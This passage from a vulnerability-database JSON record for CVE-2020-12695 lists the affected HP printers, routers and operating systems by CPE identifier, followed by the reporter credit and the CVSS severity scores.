"cpe23Uri": "cpe:2.3:h:hp:envy_110_cq809c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_110_cq809a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_110_cq809b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_110_cq809d:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_110_cq812c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_100_cn517a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_100_cn517b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_100_cn517c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_100_cn518a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_100_cn519a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_100_cn519b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5000_m2u91a:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_pro_6420_5se45b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_pro_6420_5se46a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_pro_6420_6wd14a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_pro_6420_6wd16a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_pro_6452_5se47a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_pro_6455_5se45a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:5020_z4a69a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:5030_m2u92b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:5030_z4a70a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:5034_z4a74a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:5660_f8b04a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5665_f8b06a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5664_f8b08a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_7640:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_7644_e4w46a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_7645_e4w44a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5640_b9s56a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5640_b9s58a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_6540_b9s59a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5642_b9s64a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5643_b9s63a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5644_b9s65a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5646_f8b05a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5540_f2e72a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5540_g0v47a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5540_g0v52a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5540_g0v51a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5540_g0v53a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5540_k7c85a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5541_k7g89a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5542_k7c88a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5543_n9u88a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5544_k7c89a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5544_k7c93a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5545_g0v50a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5546_k7c90a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5547_j6u64a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5548_k7g87a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_5575_g0v48b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_5575_g0v48c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_4535_f0v64a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_4535_f0v64b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_4535_f0v64c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_4536_f0v65a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_4538_f0v66b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_4675_f1h97a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_4675_f1h97b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_4675_f1h97c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_4676_f1h98a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_4678_f1h99b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4511_k9h50a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4512_k9h49a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4513_k9h51a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4516_k9h52a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4520_e6g67a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4520_e6g67b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4520_f0v63a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4520_f0v63b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4520_f0v69a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4521_k9t10b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4522_f0v67a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4523_j6u60b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4524_f0v71b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4524_f0v72b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4524_k9t01a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4525_k9t09b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4526_k9t05b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4527_j6u61b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4528_k9t08b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:officejet_4650_e6g87a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:officejet_4650_f1h96a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:officejet_4650_f1h96b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:officejet_4652_f1j02a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:officejet_4652_k9v84b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:officejet_4652_f1j05b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:officejet_4654_f1j07b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:officejet_4654_f1j06b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:officejet_4655_f1j00a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:officejet_4655_k9v79a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:officejet_4655_k9v82b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:officejet_4656_k9v81b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:officejet_4657_v6d29b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:officejet_4658_v6d30b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5530:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5536:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5531:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5539:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5532:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_4515:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5534:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_4518:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5535:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_3545_a9t81a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_3545_a9t81c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_3545_a9t83b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_3546_a9t82a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_3456_a9t84c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_3548_a9t81b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4509_d3p94a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4509_d3p94b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4501_c8d05a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4502_a9t85a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4502_a9t87b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4503_e6g71b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4504_a9t88b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4504_c8d04a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4505_a9t86a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4507_e6g70b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4508_e6g72b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4500_a9t80a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4500_a9t80b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4500_a9t89a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4500_d3p93a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_120_cz022a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_120_cz022b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_120_cz022c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_6220_k7g20d:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_6220_k7g21b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_6230_k7g25b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_6232_k7g26b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_6234_k7s21b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_6252_k7g22a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_6222_y0k13d:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_6222_y0k14d:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7830_y0g50b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7822_y0g42d:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7822_y0g43d:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7120_z3m41d:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7155_z3m52a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7164_k7g99a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_6020_5se16b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_6020_5se17a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_6020_6wd35a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_6020_7cz37a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_6052_5se18a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_6055_5se16a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:huawei:hg532e:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:huawei:hg255s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nec:wr8165n:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:netgear:wnhde111:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:ruckussecurity:zonedirector_1200:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:tp-link:archer_c50:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:zte:zxv10_w300:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:zyxel:vmg8324-b10a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:zyxel:amg1202-t10b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:xbox_one:10.0.19041.2494:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:20.04:*:*:*:lts:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-12695"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "This vulnerability was reported by Yunus \u00c7adirci from EY Turkey. This document was written by Vijay Sarvepalli. ",
"sources": [
{
"db": "CERT/CC",
"id": "VU#339275"
}
],
"trust": 0.8
},
"cve": "CVE-2020-12695",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 7.8,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 7.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2020-006708",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-165399",
"impactScore": 7.8,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULMON",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2020-12695",
"impactScore": 7.8,
"integrityImpact": "NONE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.1,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.2,
"impactScore": 4.7,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "JVNDB-2020-006708",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-12695",
